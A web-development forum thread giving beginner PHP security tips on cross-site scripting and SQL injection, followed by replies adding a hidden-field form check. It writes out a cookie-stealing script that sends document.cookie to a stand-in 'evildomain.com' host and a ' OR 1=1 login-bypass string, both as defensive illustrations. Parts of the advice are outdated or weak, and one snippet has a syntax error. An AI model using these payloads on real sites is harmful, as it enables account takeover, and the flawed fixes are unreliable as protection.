if you want to gaurd against someone getting info from your database try this very simple. your code probably looks something like this PHP: $id = $_GET['id']; echo 'Displaying news item number '.$id; Now, if PHP: $_GET['id'] contains a number, then all's well and good—but what happens if it contains this? HTML: <script> window.location.href = "http://evildomain.com/cookie-stealer.php?c=' + document.cookie; </script> If a user passed this simple Javascript into the PHP: $_GET['id'] variable and convinced a user to click it, then the script would be executed and pass the user's cookie data onto the attacker, allowing them to log in as the user. It's really that simple. Firstly, you must never implicitly trust user input. Always presume that every bit of input contains an attack, and code to account for that. To do this, you need to filter user input, removing it of HTML tags so that no Javascript can be run. The easiest way to do this is with PHP's built in PHP: strip_tags() function, which will remove HTML from a string rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through PHP: htmlentities() which will convert < and > to < and > respectively. Many sites use databases as a backend to store their data, using queries to insert and select data from it. However, many people are unaware that such sites are often vulnerable to a form of attack called SQL injection. SQL injection is when malformed user input is used directly and deliberately in an SQL query, in a way that allows the attacker to manipulate the query. This means that an attacker could delete portions of your database, make himself an admin account etc—the possibilities are endless. One of the most common vulnerabilities is when logging in to a site. Take this example: PHP: $username = $_POST['username'];$password = $_POST['password']; $result = mysql_query("SELECT *FROM site_usersWHERE username = '$username' AND password = '$password'"); if ( mysql_num_rows($result) > 0 ) // logged in This is vulnerably to a pretty obvious SQL injection; can you work out how an attacker could modify the query to allow himself to be logged in regardless of whether or not he has the right password? If the attacker enters a valid username in the username field—"rob", say—and the following in the password field: PHP: ' OR 1=1 ' The resulting query will look like this: PHP: SELECT *FROM site_usersWHERE username = 'rob' AND password = '' OR 1=1 to prevent this from happening As with XSS attacks, you must never trust user input. The best way of cleaning user input is using PHP's built in mysql_real_escape_string() function; this will escape characters such as ', " and others, making them useless in "breaking out" of a quoted string as in the above example. If you're using a number in your query, then you should use intval() on the inputted number to ensure it is numeric. So you code would look something like this. PHP: if (isset($_GET['id'])){ if(!intval($_GET['id'])){die ('Hacked'));}your sql pages ect will be here } If you find this helpfull i will do more posts on security like how to stop robots from filling in forms ect.
Great post may I ad another little tip code to keep your php script from being accessed by robots or directly instead of from the page with your form on it. Place this code in your php file. Code: $ping= $_POST['pong']; if ($ping != "pong") { exit('<h2>You cannot access this file directly!</h2>'); } then add this line to your form code Code: <input type="hidden"name="pong"value="pong"> This will make it difficult to access the script from anywhere other than your form. Hope this is of use.
reply i would say that the tips here from both of you are good and can be used ...i like this forum as here in each thread you will get some use info on web development......which is a good news about this forum...
